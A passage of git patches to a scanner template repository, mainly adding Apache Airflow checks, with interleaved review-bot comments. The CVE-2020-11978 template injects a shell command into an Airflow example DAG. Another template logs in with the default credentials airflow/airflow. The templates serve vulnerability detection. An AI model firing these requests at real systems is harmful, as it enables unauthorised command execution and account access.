--- /dev/null +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -0,0 +1,18 @@ +id: dotcms-admin-panel + +info: + name: dotcms-admin-panel + author: impramodsargar + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/dotAdmin/" + + matchers-condition: and + matchers: + - type: word + words: + - 'dotCMS Content Management Platform' From 6652b2ddb6f5ce1c4852a71165a20a5be59026dc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 13:57:09 +0530 Subject: [PATCH 096/144] Added CVE-2020-11978 --- cves/2020/CVE-2020-11978.yaml | 65 +++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 cves/2020/CVE-2020-11978.yaml diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml new file mode 100644 index 0000000000..e9964eedcd --- /dev/null +++ b/cves/2020/CVE-2020-11978.yaml 
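Review bot: `matchers-condition: and` is declared but only one matcher follows it, so the condition has nothing to combine; either drop the line or add the status check that the other panel templates in this series pair with a body word, `- type: status` / `status:` / `- 200`, which also keeps a 404 page that merely mentions the product name from counting as a detection.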
@@ -0,0 +1,65 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: | + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + tags: cve,cve2020,apache,airflow,rce + +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Content-Length: 85 + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and + 
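Review bot: The first DSL line, `'contains(body_4, "operator":"BashOperator")'`, does not pass a single string literal as the second argument of `contains`: once the YAML single quotes are stripped the argument reads `"operator":"BashOperator"`, which the expression parser is unlikely to accept, so the matcher would error or never fire; an unambiguous form is `- "contains(body_4, '\"operator\":\"BashOperator\"')"` (YAML double-quoted outside, DSL single-quoted inside). `Content-Length: 85` is also hard-coded while the JSON body is 41 bytes; nuclei normally recomputes the length for raw requests, but if the literal is honored the server waits for bytes that never arrive. Finally, the third request has a persistent side effect on a vulnerable host — it creates a file named `test` in the worker's working directory — which `description:` should state so operators can clean up afterwards or choose not to run it.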
From 4a0e83037de5741cfd890c570816a300830ccd2d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 13:58:41 +0530 Subject: [PATCH 097/144] Update CVE-2020-11978.yaml --- cves/2020/CVE-2020-11978.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index e9964eedcd..0b7751f18a 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -61,5 +61,4 @@ requests: dsl: - 'contains(body_4, "operator":"BashOperator")' - 'contains(all_headers_4, "application/json")' - condition: and - + condition: and \ No newline at end of file From bdc803fd4b5ee87a02b7453f20ccf42a9febfd90 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 14:23:34 +0530 Subject: [PATCH 098/144] Added CVE-2020-13927 --- cves/2020/CVE-2020-13927.yaml | 20 ++++++++++++++++++++ misconfiguration/airflow-api-exposure.yaml | 13 +++++++++---- 2 files changed, 29 insertions(+), 4 deletions(-) create mode 100644 cves/2020/CVE-2020-13927.yaml diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml new file mode 100644 index 0000000000..0a5d03ba2a --- /dev/null +++ b/cves/2020/CVE-2020-13927.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-13927 + +info: + name: Unauthenticated Airflow Experimental REST API + author: pdteam + severity: medium + tags: cve,cve2020,apache,airflow,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/api/experimental/latest_runs' + + matchers: + - type: word + words: + - '"dag_run_url":' + - '"dag_id":' + - '"items":' + condition: and \ No newline at end of file diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml index 2d73efdfce..0336a47dec 100644 --- a/misconfiguration/airflow-api-exposure.yaml +++ b/misconfiguration/airflow-api-exposure.yaml 
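Review bot: The new cves/2020/CVE-2020-13927.yaml has no `reference:` entry, while the same commit adds exactly that block (the NVD page and the apache.org thread) to misconfiguration/airflow-api-exposure.yaml; copy it into the CVE template so the advisory is cited where the id lives. The second file's hunk also rewrites its `id:` to `CVE-2020-13927`, so after this commit two templates in the tree carry the same id with identical requests and matchers, and nuclei reports findings by template id, which makes the duplicates indistinguishable in output; the misconfiguration copy should be removed or keep its own id rather than mirror the CVE one.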
@@ -1,18 +1,23 @@ -id: airflow-api-exposure +id: CVE-2020-13927 info: - name: Apache Airflow API Exposure / Unauthenticated Access + name: Unauthenticated Airflow Experimental REST API author: pdteam severity: medium - tags: apache,airflow,unauth + tags: cve,cve2020,apache,airflow,unauth + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E requests: - method: GET path: - '{{BaseURL}}/api/experimental/latest_runs' + matchers: - type: word words: - '"dag_run_url":' - - '{"items":[' + - '"dag_id":' + - '"items":' condition: and \ No newline at end of file From 4cf49fa3977b47ff55dd448b07fec9f8f031f7b0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 14:31:16 +0530 Subject: [PATCH 099/144] Duplicate template Duplicate with misconfiguration/unauthenticated-airflow.yaml --- exposed-panels/airflow-exposure.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 exposed-panels/airflow-exposure.yaml diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml deleted file mode 100644 index 9130363b09..0000000000 --- a/exposed-panels/airflow-exposure.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: airflow-exposure - -info: - name: Apache Airflow Exposure / Unauthenticated Access - author: pdteam - severity: medium - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/admin/' - matchers: - - type: word - words: - - 'Airflow - DAGs' - - '' - condition: and \ No newline at end of file From 2ca551360614e0fcbb6264bc3cc260369b5fa37e Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 14:35:16 +0530 Subject: [PATCH 100/144] Added airflow detection template --- technologies/apache-airflow.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/apache-airflow.yaml diff --git a/technologies/apache-airflow.yaml b/technologies/apache-airflow.yaml new file mode 100644 index 0000000000..e7f63e3b54 --- /dev/null +++ b/technologies/apache-airflow.yaml @@ -0,0 +1,24 @@ +id: apache-airflow + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow - Login" + + - type: status + status: + - 200 \ No newline at end of file From 081eb1d134959453de764ec0e8454b5242f50eb8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 16:05:42 +0530 Subject: [PATCH 101/144] Create airflow-workflow.yaml --- workflows/airflow-workflow.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 workflows/airflow-workflow.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml new file mode 100644 index 0000000000..a60411e4b3 --- /dev/null +++ b/workflows/airflow-workflow.yaml @@ -0,0 +1,16 @@ +id: airflow-workflow + +info: + name: Apache Airflow Security Checks + author: pdteam + description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target. + tags: workflow + +workflows: + + - template: technologies/apache-airflow.yaml + subtemplates: + - template: cves/2020/CVE-2020-11978.yaml + - template: cves/2020/CVE-2020-13927.yaml + - template: exposures/configs/airflow-configuration-exposure.yaml + - template: misconfiguration/unauthenticated-airflow.yaml \ No newline at end of file 
From e79f393a2a830910a4faa3fd69091adf3f4ebccb Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 18:10:37 +0530 Subject: [PATCH 102/144] Added Airflow default login check --- .../apache/airflow-default-credentials.yaml | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 default-logins/apache/airflow-default-credentials.yaml diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml new file mode 100644 index 0000000000..71f4584cb5 --- /dev/null +++ b/default-logins/apache/airflow-default-credentials.yaml 
@@ -0,0 +1,61 @@ +id: airflow-default-credentials + +info: + name: Apache Airflwo Default Credentials + author: pdteam + severity: critical + tags: airflow,default-login + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + +requests: + - raw: + - | + GET /admin/airflow/login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + POST /admin/airflow/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 152 + Cache-Control: max-age=0 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + Accept-Encoding: gzip, deflate + Accept-Language: en-IN,en;q=0.9 + Connection: close + + username=airflow&password=airflow&_csrf_token={{csrf_token}} + + extractors: + - type: regex + name: csrf_token + group: 1 + part: body + internal: true + regex: + - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">' + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "session=." + - "/admin/" + part: header + condition: and + + - type: word + words: + - 'You should be redirected automatically to target URL: /admin/' + part: body + + - type: status + status: + - 302 From 889872490d6342b88252c89adea91fa59f2b723c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 18:12:31 +0530 Subject: [PATCH 103/144] Updated workflow --- workflows/airflow-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index a60411e4b3..d6f0730099 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml 
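Review bot: In the header matcher, `- "session=."` is a `word` matcher, so the `.` is a literal character and the check only passes when the `session` cookie value itself begins with a dot; if I read the Flask/itsdangerous cookie format correctly that prefix appears only when the payload was compressed, so a successful login that sets a short session could be missed. A regex matcher, `- type: regex` / `part: header` / `regex: ['Set-Cookie: session=[^;]+']`, combined with the existing `/admin/` word under `condition: and`, is the robust equivalent. `Content-Length: 152` is also hard-coded although the body length depends on the extracted `{{csrf_token}}`; nuclei normally recomputes it, but the literal is misleading and should be dropped if it is not needed.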
@@ -13,4 +13,5 @@ workflows: - template: cves/2020/CVE-2020-11978.yaml - template: cves/2020/CVE-2020-13927.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - - template: misconfiguration/unauthenticated-airflow.yaml \ No newline at end of file + - template: misconfiguration/unauthenticated-airflow.yaml + - template: default-logins/apache/airflow-default-credentials.yaml \ No newline at end of file From 4f7a3c8ed7c42f9f08681b5b383b7797932e60b4 Mon Sep 17 00:00:00 2001 From: Ais8Ooz8 <66470347+Ais8Ooz8@users.noreply.github.com> Date: Thu, 3 Jun 2021 15:47:49 +0300 Subject: [PATCH 104/144] Update detect-options-method.yaml --- miscellaneous/detect-options-method.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/detect-options-method.yaml b/miscellaneous/detect-options-method.yaml index 6e56d2176f..dbeba332e1 100644 --- a/miscellaneous/detect-options-method.yaml +++ b/miscellaneous/detect-options-method.yaml @@ -16,4 +16,4 @@ requests: part: header group: 1 regex: - - "Allow: ([A-Z,]+)" + - "Allow: ([A-Z, ]+)" From 0c4f75d3adb40f1b9c7539d30bba6b1c7ae4cdde Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 18:44:50 +0530 Subject: [PATCH 105/144] Duplicate template --- misconfiguration/airflow-api-exposure.yaml | 23 ---------------------- 1 file changed, 23 deletions(-) delete mode 100644 misconfiguration/airflow-api-exposure.yaml diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml deleted file mode 100644 index 0336a47dec..0000000000 --- a/misconfiguration/airflow-api-exposure.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: CVE-2020-13927 - -info: - name: Unauthenticated Airflow Experimental REST API - author: pdteam - severity: medium - tags: cve,cve2020,apache,airflow,unauth - reference: | - - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 - - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E - -requests: - - method: GET - path: - - '{{BaseURL}}/api/experimental/latest_runs' - - matchers: - - type: word - words: - - '"dag_run_url":' - - '"dag_id":' - - '"items":' - condition: and \ No newline at end of file From a0e234fd156bbc51795ef3005ad83921a2194779 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 19:30:09 +0530 Subject: [PATCH 106/144] misc changes --- .../airflow-panel.yaml | 6 ++--- technologies/airflow-detect.yaml | 24 +++++++++++++++++++ workflows/airflow-workflow.yaml | 3 ++- 3 files changed, 29 insertions(+), 4 deletions(-) rename technologies/apache-airflow.yaml => exposed-panels/airflow-panel.yaml (76%) create mode 100644 technologies/airflow-detect.yaml diff --git a/technologies/apache-airflow.yaml b/exposed-panels/airflow-panel.yaml similarity index 76% rename from technologies/apache-airflow.yaml rename to exposed-panels/airflow-panel.yaml index e7f63e3b54..3b97fec8be 100644 --- a/technologies/apache-airflow.yaml +++ b/exposed-panels/airflow-panel.yaml @@ -1,10 +1,10 @@ -id: apache-airflow +id: airflow-panel info: - name: Apache Airflow + name: Airflow Admin login author: pdteam severity: info - tags: tech,apache,airflow + tags: panel,apache,airflow requests: - method: GET diff --git a/technologies/airflow-detect.yaml b/technologies/airflow-detect.yaml new file mode 100644 index 0000000000..f2d6d97aa2 --- /dev/null +++ b/technologies/airflow-detect.yaml 
@@ -0,0 +1,24 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 \ No newline at end of file diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index d6f0730099..1a21c5ba10 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -8,10 +8,11 @@ info: workflows: - - template: technologies/apache-airflow.yaml + - template: technologies/airflow-detect.yaml subtemplates: - template: cves/2020/CVE-2020-11978.yaml - template: cves/2020/CVE-2020-13927.yaml + - template: exposed-panels/airflow-panel.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - template: misconfiguration/unauthenticated-airflow.yaml - template: default-logins/apache/airflow-default-credentials.yaml \ No newline at end of file From 0c436e35aabd628a8457418e9bdfbcb9e8a16632 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 19:39:51 +0530 Subject: [PATCH 107/144] Added airflow-debug --- misconfiguration/airflow/airflow-debug.yaml | 26 +++++++++++++++++++ .../unauthenticated-airflow.yaml | 0 workflows/airflow-workflow.yaml | 4 +-- 3 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 misconfiguration/airflow/airflow-debug.yaml rename misconfiguration/{ => airflow}/unauthenticated-airflow.yaml (100%) diff --git a/misconfiguration/airflow/airflow-debug.yaml b/misconfiguration/airflow/airflow-debug.yaml new file mode 100644 index 0000000000..dc6f4a4a58 --- /dev/null +++ b/misconfiguration/airflow/airflow-debug.yaml 
@@ -0,0 +1,26 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/airflow/unauthenticated-airflow.yaml similarity index 100% rename from misconfiguration/unauthenticated-airflow.yaml rename to misconfiguration/airflow/unauthenticated-airflow.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 1a21c5ba10..8a5a9164e8 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -14,5 +14,5 @@ workflows: - template: cves/2020/CVE-2020-13927.yaml - template: exposed-panels/airflow-panel.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - - template: misconfiguration/unauthenticated-airflow.yaml - - template: default-logins/apache/airflow-default-credentials.yaml \ No newline at end of file + - template: default-logins/apache/airflow-default-credentials.yaml + - template: misconfiguration/airflow/ \ No newline at end of file From 9147d61ce7da38ca926c818fd4bc086c4569240b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 19:48:37 +0530 Subject: [PATCH 108/144] Added missing tags --- exposures/configs/airflow-configuration-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml index cf59dd669c..a715bba8ac 100644 --- a/exposures/configs/airflow-configuration-exposure.yaml +++ b/exposures/configs/airflow-configuration-exposure.yaml @@ -4,7 +4,7 @@ info: name: Apache Airflow Configuration Exposure author: pdteam severity: medium - tags: exposure,config + tags: exposure,config,airflow,apache requests: - method: GET From f12cbf2fd11f9b5cac95196b54b0b4bf123353b9 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 20:09:37 +0530 Subject: [PATCH 109/144] typo --- default-logins/apache/airflow-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml index 71f4584cb5..50bcb9d651 100644 --- a/default-logins/apache/airflow-default-credentials.yaml +++ b/default-logins/apache/airflow-default-credentials.yaml @@ -1,7 +1,7 @@ id: airflow-default-credentials info: - name: Apache Airflwo Default Credentials + name: Apache Airflow Default Credentials author: pdteam severity: critical tags: airflow,default-login From 258f7d7af8f2cbedb49ea87da6a1b4e81039815e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:09:10 +0530 Subject: [PATCH 110/144] Update dotcms-admin-panel.yaml --- exposed-panels/dotcms-admin-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml index d873386ea3..e1846393d7 100644 --- a/exposed-panels/dotcms-admin-panel.yaml +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -1,6 +1,6 @@ id: dotcms-admin-panel -info: +info: name: dotcms-admin-panel author: impramodsargar severity: info @@ -13,6 +13,6 @@ requests: matchers-condition: and matchers: - - type: word - words: + - type: word + words: - 'dotCMS Content Management Platform' From b5b4ba8e2433c8eb73b4540a0f15897205e2b803 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:09:35 +0530 Subject: [PATCH 111/144] Update dotcms-admin-panel.yaml --- exposed-panels/dotcms-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml index e1846393d7..15846058a0 100644 
--- a/exposed-panels/dotcms-admin-panel.yaml +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -1,7 +1,7 @@ id: dotcms-admin-panel info: - name: dotcms-admin-panel + name: dotAdmin Panel author: impramodsargar severity: info tags: panel From d29b32720d209407b26a4e9e1f5ec1208806f7db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 3 Jun 2021 15:42:52 +0000 Subject: [PATCH 112/144] Auto Update README [Thu Jun 3 15:42:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1b5f3c8e91..7c7ad57715 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 177 | exposed-panels | 144 | +| cves | 325 | vulnerabilities | 177 | exposed-panels | 145 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1192 files**. +**110 directories, 1193 files**. From 4e9d0ae79a084063caf0d16d526f80ebb07a4cb6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:14:13 +0530 Subject: [PATCH 113/144] Update nc-bsh-servlet-rce.yaml --- vulnerabilities/other/nc-bsh-servlet-rce.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/vulnerabilities/other/nc-bsh-servlet-rce.yaml index 295ceae036..ba11421301 100644 --- a/vulnerabilities/other/nc-bsh-servlet-rce.yaml +++ b/vulnerabilities/other/nc-bsh-servlet-rce.yaml 
@@ -35,5 +35,4 @@ requests: - type: status status: - - 200 - + - 200 \ No newline at end of file From 0f0ff2ee1e252c391420d85c4f94115bdc157ec0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 3 Jun 2021 21:54:08 +0530 Subject: [PATCH 114/144] moving files around --- .../CNVD-2019-01348.yaml | 5 +++-- .../xunchi-file-read.yaml => cnvd/CNVD-2020-23735.yaml | 10 ++++++---- .../CNVD-2020-56167.yaml | 4 ++-- {vulnerabilities/other => cnvd}/CNVD-2020-62422.yaml | 2 +- .../CNVD-2020-68596.yaml | 4 ++-- .../eea-disclosure.yaml => cnvd/CNVD-2021-10543.yaml | 4 ++-- .../CNVD-2021-17369.yaml | 4 ++-- 7 files changed, 18 insertions(+), 15 deletions(-) rename vulnerabilities/other/xiuno-bbs-reinstallation.yaml => cnvd/CNVD-2019-01348.yaml (94%) rename vulnerabilities/other/xunchi-file-read.yaml => cnvd/CNVD-2020-23735.yaml (85%) rename default-logins/smartweb/ruijie-smartweb-default-password.yaml => cnvd/CNVD-2020-56167.yaml (90%) rename {vulnerabilities/other => cnvd}/CNVD-2020-62422.yaml (94%) rename vulnerabilities/other/weiphp-path-traversal.yaml => cnvd/CNVD-2020-68596.yaml (95%) rename exposures/configs/eea-disclosure.yaml => cnvd/CNVD-2021-10543.yaml (90%) rename exposures/configs/ruijie-smartweb-disclosure.yaml => cnvd/CNVD-2021-17369.yaml (90%) diff --git a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml b/cnvd/CNVD-2019-01348.yaml similarity index 94% rename from vulnerabilities/other/xiuno-bbs-reinstallation.yaml rename to cnvd/CNVD-2019-01348.yaml index fd4ad35902..4102e9234e 100644 --- a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml +++ b/cnvd/CNVD-2019-01348.yaml 
@@ -1,11 +1,12 @@ -id: xiuno-bbs-reinstallation +id: CNVD-2019-01348 + info: name: Xiuno BBS CNVD-2019-01348 author: princechaddha severity: medium description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 - tags: xiuno + tags: xiuno,cnvd requests: - method: GET diff --git a/vulnerabilities/other/xunchi-file-read.yaml b/cnvd/CNVD-2020-23735.yaml similarity index 85% rename from vulnerabilities/other/xunchi-file-read.yaml rename to cnvd/CNVD-2020-23735.yaml index cc804905e3..88cf7d0df7 100644 --- a/vulnerabilities/other/xunchi-file-read.yaml +++ b/cnvd/CNVD-2020-23735.yaml @@ -1,16 +1,18 @@ -id: xunchi-file-read +id: CNVD-2020-23735 + info: - name: Xxunchi LFR (CNVD-2019-01348 + name: Xxunchi Local File read author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. reference: https://www.cnvd.org.cn/flaw/show/2025171 - tags: xunchi,lfi + tags: xunchi,lfi,cnvd requests: - method: GET path: - "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php" + matchers-condition: and matchers: - type: status @@ -21,4 +23,4 @@ requests: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" part: body - condition: and + condition: and \ No newline at end of file diff --git a/default-logins/smartweb/ruijie-smartweb-default-password.yaml b/cnvd/CNVD-2020-56167.yaml similarity index 90% rename from default-logins/smartweb/ruijie-smartweb-default-password.yaml rename to cnvd/CNVD-2020-56167.yaml index 099edceff0..1fe06f6c1c 100644 --- a/default-logins/smartweb/ruijie-smartweb-default-password.yaml +++ b/cnvd/CNVD-2020-56167.yaml 
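Review bot: In the CNVD-2020-23735 hunk the renamed template's `name: Xxunchi Local File read` still carries what looks like a doubled-letter typo from the old name (the old `id:` and the `tags:` use `xunchi`); `name: Xunchi Local File Read` would also match the capitalisation of the sibling templates in this commit. The unchanged `reference:` points at a numeric CNVD page id rather than the `CNVD-2020-23735` form the other files in this commit use, so it is worth confirming that page corresponds to this CNVD id and, if so, citing it as `https://www.cnvd.org.cn/flaw/show/CNVD-2020-23735` for consistency.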
@@ -1,11 +1,11 @@ -id: ruijie-smartweb-default-password +id: CNVD-2020-56167 info: name: Ruijie Smartweb Default Password author: pikpikcu severity: low reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - tags: ruijie,default-login + tags: ruijie,default-login,cnvd requests: - method: POST diff --git a/vulnerabilities/other/CNVD-2020-62422.yaml b/cnvd/CNVD-2020-62422.yaml similarity index 94% rename from vulnerabilities/other/CNVD-2020-62422.yaml rename to cnvd/CNVD-2020-62422.yaml index 19715aaafb..736770f82c 100644 --- a/vulnerabilities/other/CNVD-2020-62422.yaml +++ b/cnvd/CNVD-2020-62422.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium reference: https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi + tags: lfi,cnvd requests: - method: GET diff --git a/vulnerabilities/other/weiphp-path-traversal.yaml b/cnvd/CNVD-2020-68596.yaml similarity index 95% rename from vulnerabilities/other/weiphp-path-traversal.yaml rename to cnvd/CNVD-2020-68596.yaml index b50c3ba268..9f1c78f053 100644 --- a/vulnerabilities/other/weiphp-path-traversal.yaml +++ b/cnvd/CNVD-2020-68596.yaml @@ -1,11 +1,11 @@ -id: weiphp-path-traversal +id: CNVD-2020-68596 info: name: WeiPHP 5.0 Path Traversal author: pikpikcu severity: critical reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html - tags: weiphp,lfi + tags: weiphp,lfi,cnvd requests: - raw: diff --git a/exposures/configs/eea-disclosure.yaml 